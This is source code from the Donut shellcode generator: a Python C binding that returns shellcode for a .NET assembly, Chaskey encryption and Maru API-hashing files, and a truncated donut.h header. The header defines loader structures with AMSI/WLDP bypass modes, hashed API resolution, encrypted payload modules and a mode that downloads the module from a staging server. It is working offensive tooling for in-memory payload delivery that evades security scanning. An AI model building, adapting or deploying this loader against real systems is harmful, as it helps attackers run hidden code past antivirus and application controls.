29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
31 | */ | |
32 | ||
33 | #include <Python.h> | |
34 | #include "donut.h" | |
35 | ||
36 | ||
37 | static PyObject *Donut_Create(PyObject *self, PyObject *args, PyObject *keywds) { | |
38 | int *arch = NULL; | |
39 | int *bypass = NULL; | |
40 | char *appdomain = NULL; | |
41 | char *file = NULL; | |
42 | char *runtime = NULL; | |
43 | char *url = NULL; | |
44 | char *cls = NULL; | |
45 | char *method = NULL; | |
46 | char *params = NULL; | |
47 | ||
48 | int err; | |
49 | ||
50 | static char *kwlist[] = {"file", "url", "arch", "bypass", "cls", "method", "params", "runtime", "appdomain", NULL}; | |
51 | if (!PyArg_ParseTupleAndKeywords(args, keywds, "s|siisssss", kwlist, &file, &url, &arch, &bypass, &cls, &method, ¶ms, &runtime, &appdomain)) { | |
52 | return NULL; | |
53 | } | |
54 | ||
55 | DONUT_CONFIG c; | |
56 | ||
57 | // zero initialize configuration | |
58 | memset(&c, 0, sizeof(c)); | |
59 | ||
60 | // default type is position independent code for dual-mode (x86 + amd64) | |
61 | c.inst_type = DONUT_INSTANCE_PIC; | |
62 | c.arch = DONUT_ARCH_X84; | |
63 | c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails | |
64 | ||
65 | // target cpu architecture | |
66 | if (arch != NULL) { | |
67 | c.arch = arch; | |
68 | } | |
69 | ||
70 | // bypass options | |
71 | if (bypass != NULL) { | |
72 | c.bypass = bypass; | |
73 | } | |
74 | ||
75 | // name of appdomain to use | |
76 | if (appdomain != NULL) { | |
77 | strncpy(c.domain, appdomain, DONUT_MAX_NAME - 1); | |
78 | } | |
79 | ||
80 | // assembly to use | |
81 | if (file != NULL) { | |
82 | strncpy(c.file, file, DONUT_MAX_NAME - 1); | |
83 | } | |
84 | ||
85 | //runtime version to use | |
86 | if (runtime != NULL) { | |
87 | strncpy(c.runtime, runtime, DONUT_MAX_NAME - 1); | |
88 | } | |
89 | ||
90 | // url of remote assembly | |
91 | if (url != NULL) { | |
92 | strncpy(c.url, url, DONUT_MAX_URL - 2); | |
93 | c.inst_type = DONUT_INSTANCE_URL; | |
94 | } | |
95 | ||
96 | // class | |
97 | if (cls != NULL) { | |
98 | strncpy(c.cls, cls, DONUT_MAX_NAME - 1); | |
99 | } | |
100 | ||
101 | // method or exported api symbol | |
102 | if (method != NULL) { | |
103 | strncpy(c.method, method, DONUT_MAX_NAME - 1); | |
104 | } | |
105 | ||
106 | // parameters to method/exported API | |
107 | if (params != NULL) { | |
108 | strncpy(c.param, params, sizeof(c.param) - 1); | |
109 | } | |
110 | ||
111 | err = DonutCreate(&c); | |
112 | ||
113 | /* | |
114 | if (!(c.pic_len > 0)) { | |
115 | return NULL; | |
116 | } | |
117 | */ | |
118 | ||
119 | PyObject *shellcode = Py_BuildValue("y#", c.pic, c.pic_len); | |
120 | ||
121 | DonutDelete(&c); | |
122 | ||
123 | return shellcode; | |
124 | } | |
125 | ||
126 | // module's function table | |
127 | static PyMethodDef Donut_FunctionsTable[] = { | |
128 | { | |
129 | "create", // name exposed to Python | |
130 | Donut_Create, // C wrapper function | |
131 | METH_VARARGS|METH_KEYWORDS, | |
132 | "Calls DonutCreate to generate shellcode for a .NET assembly" // documentation | |
133 | }, { | |
134 | NULL, NULL, 0, NULL | |
135 | } | |
136 | }; | |
137 | ||
138 | // modules definition | |
139 | static struct PyModuleDef Donut_Module = { | |
140 | PyModuleDef_HEAD_INIT, | |
141 | "donut", // name of module exposed to Python | |
142 | "Donut Python C extension", // module documentation | |
143 | -1, | |
144 | Donut_FunctionsTable | |
145 | }; | |
146 | ||
147 | PyMODINIT_FUNC PyInit_donut(void) { | |
148 | return PyModule_Create(&Donut_Module); | |
149 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include "encrypt.h" | |
32 | ||
33 | static void chaskey(void *mk, void *p) { | |
34 | uint32_t i,*w=p,*k=mk; | |
35 | ||
36 | // add 128-bit master key | |
37 | for(i=0;i<4;i++) w[i]^=k[i]; | |
38 | ||
39 | // apply 16 rounds of permutation | |
40 | for(i=0;i<16;i++) { | |
41 | w[0] += w[1], | |
42 | w[1] = ROTR32(w[1], 27) ^ w[0], | |
43 | w[2] += w[3], | |
44 | w[3] = ROTR32(w[3], 24) ^ w[2], | |
45 | w[2] += w[1], | |
46 | w[0] = ROTR32(w[0], 16) + w[3], | |
47 | w[3] = ROTR32(w[3], 19) ^ w[0], | |
48 | w[1] = ROTR32(w[1], 25) ^ w[2], | |
49 | w[2] = ROTR32(w[2], 16); | |
50 | } | |
51 | // add 128-bit master key | |
52 | for(i=0;i<4;i++) w[i]^=k[i]; | |
53 | } | |
54 | ||
55 | // encrypt/decrypt data in counter mode | |
56 | void donut_encrypt(void *mk, void *ctr, void *data, size_t len) { | |
57 | uint8_t x[CIPHER_BLK_LEN], | |
58 | *p=(uint8_t*)data, | |
59 | *c=(uint8_t*)ctr; | |
60 | int i, r; | |
61 | ||
62 | while(len) { | |
63 | // copy counter+nonce to local buffer | |
64 | for(i=0;i<CIPHER_BLK_LEN;i++) | |
65 | x[i] = c[i]; | |
66 | ||
67 | // donut_encrypt x | |
68 | ENCRYPT(mk, &x); | |
69 | ||
70 | // XOR plaintext with ciphertext | |
71 | r = len > CIPHER_BLK_LEN ? CIPHER_BLK_LEN : len; | |
72 | ||
73 | for(i=0;i<r;i++) | |
74 | p[i] ^= x[i]; | |
75 | ||
76 | // update length + position | |
77 | len -= r; p += r; | |
78 | ||
79 | // update counter | |
80 | for(i=CIPHER_BLK_LEN;i>0;i--) | |
81 | if(++c[i-1]) break; | |
82 | } | |
83 | } | |
84 | ||
85 | #ifdef TEST | |
86 | ||
87 | #include <stdio.h> | |
88 | #include <string.h> | |
89 | #include <stdint.h> | |
90 | ||
91 | // 128-bit master key | |
92 | uint8_t key[16] = | |
93 | { 0x56, 0x09, 0xe9, 0x68, 0x5f, 0x58, 0xe3, 0x29, | |
94 | 0x40, 0xec, 0xec, 0x98, 0xc5, 0x22, 0x98, 0x2f }; | |
95 | ||
96 | // 128-bit plain text | |
97 | uint8_t plain[16]= | |
98 | { 0xb8, 0x23, 0x28, 0x26, 0xfd, 0x5e, 0x40, 0x5e, | |
99 | 0x69, 0xa3, 0x01, 0xa9, 0x78, 0xea, 0x7a, 0xd8 }; | |
100 | ||
101 | // 128-bit cipher text | |
102 | uint8_t cipher[16] = | |
103 | { 0xd5, 0x60, 0x8d, 0x4d, 0xa2, 0xbf, 0x34, 0x7b, | |
104 | 0xab, 0xf8, 0x77, 0x2f, 0xdf, 0xed, 0xde, 0x07 }; | |
105 | ||
106 | int main(void) { | |
107 | uint8_t data[16]; | |
108 | int equ; | |
109 | ||
110 | memcpy(data, plain, 16); | |
111 | chaskey(key, data); | |
112 | equ = (memcmp(data, cipher, 16)==0); | |
113 | printf("Chaskey test : %s\n", equ ? "OK" : "FAILED"); | |
114 | return 0; | |
115 | } | |
116 | ||
117 | #endif | |
118 |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2017 Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include "hash.h" | |
32 | ||
33 | // SPECK-64/128 | |
34 | static uint64_t speck(void *mk, uint64_t p) { | |
35 | uint32_t k[4], i, t; | |
36 | union { | |
37 | uint32_t w[2]; | |
38 | uint64_t q; | |
39 | } x; | |
40 | ||
41 | // copy 64-bit plaintext to local buffer | |
42 | x.q = p; | |
43 | ||
44 | // copy 128-bit master key to local buffer | |
45 | for(i=0;i<4;i++) k[i]=((uint32_t*)mk)[i]; | |
46 | ||
47 | for(i=0;i<27;i++) { | |
48 | // encrypt 64-bit plaintext | |
49 | x.w[0] = (ROTR32(x.w[0], 8) + x.w[1]) ^ k[0]; | |
50 | x.w[1] = ROTR32(x.w[1],29) ^ x.w[0]; | |
51 | ||
52 | // create next 32-bit subkey | |
53 | t = k[3]; | |
54 | k[3] = (ROTR32(k[1], 8) + k[0]) ^ i; | |
55 | k[0] = ROTR32(k[0],29) ^ k[3]; | |
56 | k[1] = k[2]; k[2] = t; | |
57 | } | |
58 | // return 64-bit ciphertext | |
59 | return x.q; | |
60 | } | |
61 | ||
62 | uint64_t maru(const void *input, uint64_t iv) { | |
63 | uint64_t h; | |
64 | uint32_t len, idx, end; | |
65 | const char *api = (const char*)input; | |
66 | ||
67 | union { | |
68 | uint8_t b[MARU_BLK_LEN]; | |
69 | uint32_t w[MARU_BLK_LEN/4]; | |
70 | } m; | |
71 | ||
72 | // set H to initial value | |
73 | h = iv; | |
74 | ||
75 | for(idx=0, len=0, end=0;!end;) { | |
76 | // end of string or max len? | |
77 | if(api[len] == 0 || len == MARU_MAX_STR) { | |
78 | // zero remainder of M | |
79 | Memset(&m.b[idx], 0, MARU_BLK_LEN - idx); | |
80 | // store the end bit | |
81 | m.b[idx] = 0x80; | |
82 | // have we space in M for api length? | |
83 | if(idx >= MARU_BLK_LEN - 4) { | |
84 | // no, update H with E | |
85 | h ^= MARU_CRYPT(&m, h); | |
86 | // zero M | |
87 | Memset(&m, 0, MARU_BLK_LEN); | |
88 | } | |
89 | // store total length in bits | |
90 | m.w[(MARU_BLK_LEN/4)-1] = (len * 8); | |
91 | idx = MARU_BLK_LEN; | |
92 | end++; | |
93 | } else { | |
94 | // store character from api string | |
95 | m.b[idx] = (uint8_t)api[len]; | |
96 | idx++; len++; | |
97 | } | |
98 | if(idx == MARU_BLK_LEN) { | |
99 | // update H with E | |
100 | h ^= MARU_CRYPT(&m, h); | |
101 | // reset idx | |
102 | idx = 0; | |
103 | } | |
104 | } | |
105 | return h; | |
106 | } | |
107 | ||
108 | #ifdef TEST | |
109 | ||
110 | #include <stdio.h> | |
111 | #include <stdlib.h> | |
112 | #include <string.h> | |
113 | ||
114 | int main(int argc, char *argv[]) { | |
115 | ||
116 | uint64_t ulDllHash, ulApiHash, iv; | |
117 | char *api, *dll; | |
118 | ||
119 | if(argc != 4) { | |
120 | printf("\nusage: maru <iv> <dll> <api>\n"); | |
121 | return 0; | |
122 | } | |
123 | ||
124 | // convert hexadecimal IV to binary | |
125 | iv = strtoull(argv[1], NULL, 16); | |
126 | dll = argv[2]; | |
127 | api = argv[3]; | |
128 | ||
129 | printf("\nIV : %p\n", (void*)iv); | |
130 | ||
131 | ulDllHash = maru(dll, iv); | |
132 | printf("DLL : %p\n", (void*)ulDllHash); | |
133 | ||
134 | ulApiHash = maru(api, iv) + ulDllHash; | |
135 | printf("API : %p\n", (void*)ulApiHash); | |
136 | ||
137 | return 0; | |
138 | } | |
139 | #endif |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef DONUT_H | |
32 | #define DONUT_H | |
33 | ||
34 | #include <stdint.h> | |
35 | #include <stdio.h> | |
36 | #include <stdlib.h> | |
37 | #include <string.h> | |
38 | #include <sys/stat.h> | |
39 | #include <inttypes.h> | |
40 | #include <fcntl.h> | |
41 | ||
42 | #if defined(_WIN32) || defined(_WIN64) | |
43 | #define WINDOWS | |
44 | #include <windows.h> | |
45 | #ifndef PAYLOAD_H | |
46 | #include "mmap.h" | |
47 | #endif | |
48 | #if defined(_MSC_VER) | |
49 | #pragma comment(lib, "advapi32.lib") | |
50 | #endif | |
51 | #else | |
52 | #define LINUX | |
53 | #include <unistd.h> | |
54 | #include <sys/types.h> | |
55 | #include <sys/mman.h> | |
56 | #include "pe.h" | |
57 | #endif | |
58 | ||
59 | #ifndef PAYLOAD_H | |
60 | ||
61 | #if defined(DEBUG) | |
62 | #define DPRINT(...) { \ | |
63 | fprintf(stderr, "DEBUG: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \ | |
64 | fprintf(stderr, __VA_ARGS__); \ | |
65 | fprintf(stderr, "\n"); \ | |
66 | } | |
67 | #else | |
68 | #define DPRINT(...) // Don't do anything in release builds | |
69 | #endif | |
70 | ||
71 | #endif | |
72 | ||
73 | #if !defined(NOCRYPTO) | |
74 | #include "hash.h" // api hashing | |
75 | #include "encrypt.h" // symmetric encryption of instance+module | |
76 | #endif | |
77 | ||
78 | #if !defined(WINDOWS) | |
79 | #define strnicmp(x,y,z) strncasecmp(x,y,z) | |
80 | typedef uint64_t ULONG64, *PULONG64; | |
81 | typedef uint32_t DWORD, *PDWORD; | |
82 | typedef uint16_t WORD, *PWORD; | |
83 | typedef uint8_t BYTE, *PBYTE; | |
84 | ||
85 | typedef char CHAR, *PCHAR; | |
86 | typedef size_t SIZE_T; | |
87 | ||
88 | typedef struct _GUID { | |
89 | DWORD Data1; | |
90 | WORD Data2; | |
91 | WORD Data3; | |
92 | BYTE Data4[8]; | |
93 | } GUID; | |
94 | #endif | |
95 | ||
96 | #define DONUT_KEY_LEN CIPHER_KEY_LEN | |
97 | #define DONUT_BLK_LEN CIPHER_BLK_LEN | |
98 | ||
99 | #define DONUT_ERROR_SUCCESS 0 | |
100 | #define DONUT_ERROR_FILE_NOT_FOUND 1 | |
101 | #define DONUT_ERROR_FILE_EMPTY 2 | |
102 | #define DONUT_ERROR_FILE_ACCESS 3 | |
103 | #define DONUT_ERROR_FILE_INVALID 4 | |
104 | #define DONUT_ERROR_NET_PARAMS 5 | |
105 | #define DONUT_ERROR_NO_MEMORY 6 | |
106 | #define DONUT_ERROR_INVALID_ARCH 7 | |
107 | #define DONUT_ERROR_INVALID_URL 8 | |
108 | #define DONUT_ERROR_URL_LENGTH 9 | |
109 | #define DONUT_ERROR_INVALID_PARAMETER 10 | |
110 | #define DONUT_ERROR_RANDOM 11 | |
111 | #define DONUT_ERROR_DLL_FUNCTION 12 | |
112 | #define DONUT_ERROR_ARCH_MISMATCH 13 | |
113 | #define DONUT_ERROR_DLL_PARAM 14 | |
114 | #define DONUT_ERROR_BYPASS_INVALID 15 | |
115 | ||
116 | // target architecture | |
117 | #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files | |
118 | #define DONUT_ARCH_X86 1 // x86 | |
119 | #define DONUT_ARCH_X64 2 // AMD64 | |
120 | #define DONUT_ARCH_X84 3 // AMD64 + x86 | |
121 | ||
122 | // module type | |
123 | #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method | |
124 | #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided | |
125 | #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional | |
126 | #define DONUT_MODULE_EXE 4 // Unmanaged EXE | |
127 | #define DONUT_MODULE_VBS 5 // VBScript | |
128 | #define DONUT_MODULE_JS 6 // JavaScript or JScript | |
129 | #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded | |
130 | ||
131 | // instance type | |
132 | #define DONUT_INSTANCE_PIC 1 // Self-contained | |
133 | #define DONUT_INSTANCE_URL 2 // Download from remote server | |
134 | ||
135 | // AMSI/WLDP options | |
136 | #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP | |
137 | #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running | |
138 | #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running | |
139 | ||
140 | // apparently C# can support 2^16 or 65,536 parameters | |
141 | // we support up to eight for now :) | |
142 | // Changing these would require updating call_api.asm for unmanaged EXE/DLL | |
143 | #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method | |
144 | #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names | |
145 | #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance | |
146 | #define DONUT_MAX_URL 256 | |
147 | #define DONUT_MAX_MODNAME 8 | |
148 | #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok | |
149 | #define DONUT_VER_LEN 32 | |
150 | #define DONUT_DOMAIN_LEN 8 | |
151 | ||
152 | #define DONUT_RUNTIME_NET2 "v2.0.50727" | |
153 | #define DONUT_RUNTIME_NET4 "v4.0.30319" | |
154 | ||
155 | #define NTDLL_DLL "ntdll.dll" | |
156 | #define KERNEL32_DLL "kernel32.dll" | |
157 | #define ADVAPI32_DLL "advapi32.dll" | |
158 | #define CRYPT32_DLL "crypt32.dll" | |
159 | #define MSCOREE_DLL "mscoree.dll" | |
160 | #define OLE32_DLL "ole32.dll" | |
161 | #define OLEAUT32_DLL "oleaut32.dll" | |
162 | #define WININET_DLL "wininet.dll" | |
163 | #define COMBASE_DLL "combase.dll" | |
164 | #define USER32_DLL "user32.dll" | |
165 | #define SHLWAPI_DLL "shlwapi.dll" | |
166 | ||
167 | // Per the ECMA spec, the section data looks like this: | |
168 | // taken from https://github.com/dotnet/coreclr/ | |
169 | // | |
170 | typedef struct tagMDSTORAGESIGNATURE { | |
171 | ULONG lSignature; // "Magic" signature. | |
172 | USHORT iMajorVer; // Major file version. | |
173 | USHORT iMinorVer; // Minor file version. | |
174 | ULONG iExtraData; // Offset to next structure of information | |
175 | ULONG iVersionString; // Length of version string | |
176 | BYTE pVersion[0]; // Version string | |
177 | } MDSTORAGESIGNATURE, *PMDSTORAGESIGNATURE; | |
178 | ||
179 | // | |
180 | typedef struct _file_info_t { | |
181 | int fd; | |
182 | uint64_t size; | |
183 | uint8_t *map; | |
184 | ||
185 | // the following are set for unmanaged or .NET PE/DLL files | |
186 | int type; | |
187 | int arch; | |
188 | char ver[DONUT_VER_LEN]; | |
189 | } file_info; | |
190 | ||
191 | typedef struct _API_IMPORT { | |
192 | const char *module; | |
193 | const char *name; | |
194 | } API_IMPORT, *PAPI_IMPORT; | |
195 | ||
196 | typedef struct _DONUT_CRYPT { | |
197 | BYTE mk[DONUT_KEY_LEN]; // master key | |
198 | BYTE ctr[DONUT_BLK_LEN]; // counter + nonce | |
199 | } DONUT_CRYPT, *PDONUT_CRYPT; | |
200 | ||
201 | // everything required for a module goes in the following structure | |
202 | typedef struct _DONUT_MODULE { | |
203 | DWORD type; // EXE, DLL, JS, VBS, XSL | |
204 | WCHAR runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL | |
205 | WCHAR domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL | |
206 | WCHAR cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL | |
207 | WCHAR method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL | |
208 | DWORD param_cnt; // number of parameters for DLL/EXE | |
209 | WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE | |
210 | CHAR sig[DONUT_MAX_NAME]; // random string to verify decryption | |
211 | ULONG64 mac; // to verify decryption was ok | |
212 | ULONG64 len; // size of EXE/DLL/XSL/JS/VBS file | |
213 | BYTE data[4]; // data of EXE/DLL/XSL/JS/VBS file | |
214 | } DONUT_MODULE, *PDONUT_MODULE; | |
215 | ||
216 | // everything required for an instance goes into the following structure | |
217 | typedef struct _DONUT_INSTANCE { | |
218 | uint32_t len; // total size of instance | |
219 | DONUT_CRYPT key; // decrypts instance | |
220 | ||
221 | uint64_t iv; // the 64-bit initial value for maru hash | |
222 | ||
223 | union { | |
224 | uint64_t hash[64]; // holds up to 64 api hashes | |
225 | void *addr[64]; // holds up to 64 api addresses | |
226 | // include prototypes only if header included from payload.h | |
227 | #ifdef PAYLOAD_H | |
228 | struct { | |
229 | // imports from kernel32.dll or kernelbase.dll | |
230 | LoadLibraryA_t LoadLibraryA; | |
231 | GetProcAddress_t GetProcAddress; | |
232 | GetModuleHandleA_t GetModuleHandleA; | |
233 | VirtualAlloc_t VirtualAlloc; // required to allocate RW memory for instance | |
234 | VirtualFree_t VirtualFree; | |
235 | VirtualQuery_t VirtualQuery; | |
236 | VirtualProtect_t VirtualProtect; | |
237 | Sleep_t Sleep; | |
238 | MultiByteToWideChar_t MultiByteToWideChar; | |
239 | GetUserDefaultLCID_t GetUserDefaultLCID; | |
240 | ||
241 | // imports from oleaut32.dll | |
242 | SafeArrayCreate_t SafeArrayCreate; | |
243 | SafeArrayCreateVector_t SafeArrayCreateVector; | |
244 | SafeArrayPutElement_t SafeArrayPutElement; | |
245 | SafeArrayDestroy_t SafeArrayDestroy; | |
246 | SafeArrayGetLBound_t SafeArrayGetLBound; | |
247 | SafeArrayGetUBound_t SafeArrayGetUBound; | |
248 | SysAllocString_t SysAllocString; | |
249 | SysFreeString_t SysFreeString; | |
250 | LoadTypeLib_t LoadTypeLib; | |
251 | ||
252 | // imports from wininet.dll | |
253 | InternetCrackUrl_t InternetCrackUrl; | |
254 | InternetOpen_t InternetOpen; | |
255 | InternetConnect_t InternetConnect; | |
256 | InternetSetOption_t InternetSetOption; | |
257 | InternetReadFile_t InternetReadFile; | |
258 | InternetCloseHandle_t InternetCloseHandle; | |
259 | HttpOpenRequest_t HttpOpenRequest; | |
260 | HttpSendRequest_t HttpSendRequest; | |
261 | HttpQueryInfo_t HttpQueryInfo; | |
262 | ||
263 | // imports from mscoree.dll | |
264 | CorBindToRuntime_t CorBindToRuntime; | |
265 | CLRCreateInstance_t CLRCreateInstance; | |
266 | ||
267 | // imports from ole32.dll | |
268 | CoInitializeEx_t CoInitializeEx; | |
269 | CoCreateInstance_t CoCreateInstance; | |
270 | CoUninitialize_t CoUninitialize; | |
271 | }; | |
272 | #endif | |
273 | } api; | |
274 | ||
275 | // everything from here is encrypted | |
276 | int api_cnt; // the 64-bit hashes of API required for instance to work | |
277 | int dll_cnt; // the number of DLL to load before resolving API | |
278 | char dll_name[DONUT_MAX_DLL][32]; // a list of DLL strings to load | |
279 | ||
280 | union { | |
281 | char s[8]; // amsi.dll | |
282 | uint32_t w[2]; | |
283 | } amsi; | |
284 | ||
285 | int bypass; // indicates behaviour of byassing AMSI/WLDP | |
286 | char clr[8]; // clr.dll | |
287 | char wldp[16]; // wldp.dll | |
288 | char wldpQuery[32]; // WldpQueryDynamicCodeTrust | |
289 | char wldpIsApproved[32]; // WldpIsClassInApprovedList | |
290 | char amsiInit[16]; // AmsiInitialize | |
291 | char amsiScanBuf[16]; // AmsiScanBuffer | |
292 | char amsiScanStr[16]; // AmsiScanString | |
293 | ||
294 | uint16_t wscript[8]; // WScript | |
295 | uint16_t wscript_exe[16]; // wscript.exe | |
296 | ||
297 | GUID xIID_IUnknown; | |
298 | GUID xIID_IDispatch; | |
299 | ||
300 | // GUID required to load .NET assemblies | |
301 | GUID xCLSID_CLRMetaHost; | |
302 | GUID xIID_ICLRMetaHost; | |
303 | GUID xIID_ICLRRuntimeInfo; | |
304 | GUID xCLSID_CorRuntimeHost; | |
305 | GUID xIID_ICorRuntimeHost; | |
306 | GUID xIID_AppDomain; | |
307 | ||
308 | // GUID required to run VBS and JS files | |
309 | GUID xCLSID_ScriptLanguage; // vbs or js | |
310 | GUID xIID_IHost; // wscript object | |
311 | GUID xIID_IActiveScript; // engine | |
312 | GUID xIID_IActiveScriptSite; // implementation | |
313 | GUID xIID_IActiveScriptParse32; // parser | |
314 | GUID xIID_IActiveScriptParse64; | |
315 | ||
316 | // GUID required to run XSL files | |
317 | GUID xCLSID_DOMDocument30; | |
318 | GUID xIID_IXMLDOMDocument; | |
319 | GUID xIID_IXMLDOMNode; | |
320 | ||
321 | int type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL | |
322 | ||
323 | struct { | |
324 | char url[DONUT_MAX_URL]; // staging server hosting donut module | |
325 | char req[8]; // just a buffer for "GET" | |
326 | } http; | |
327 | ||
328 | uint8_t sig[DONUT_MAX_NAME]; // string to hash | |
329 | uint64_t mac; // to verify decryption ok | |
330 | ||
331 | DONUT_CRYPT mod_key; // used to decrypt module | |
332 | uint64_t mod_len; // total size of module | |
333 | ||
334 | union { | |
335 | PDONUT_MODULE p; // for URL | |
336 | DONUT_MODULE x; // for PIC | |
337 | } module; | |
338 | } DONUT_INSTANCE, *PDONUT_INSTANCE; | |
339 | ||
340 | typedef struct _DONUT_CONFIG { | |
341 | int arch; // target architecture for shellcode | |
342 | int bypass; // bypass option for AMSI/WDLP | |
343 | char domain[DONUT_MAX_NAME]; // name of domain to create for assembly | |
344 | char cls[DONUT_MAX_NAME]; // name of class and optional namespace | |
345 | char method[DONUT_MAX_NAME]; // name of method to execute | |
346 | char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon | |
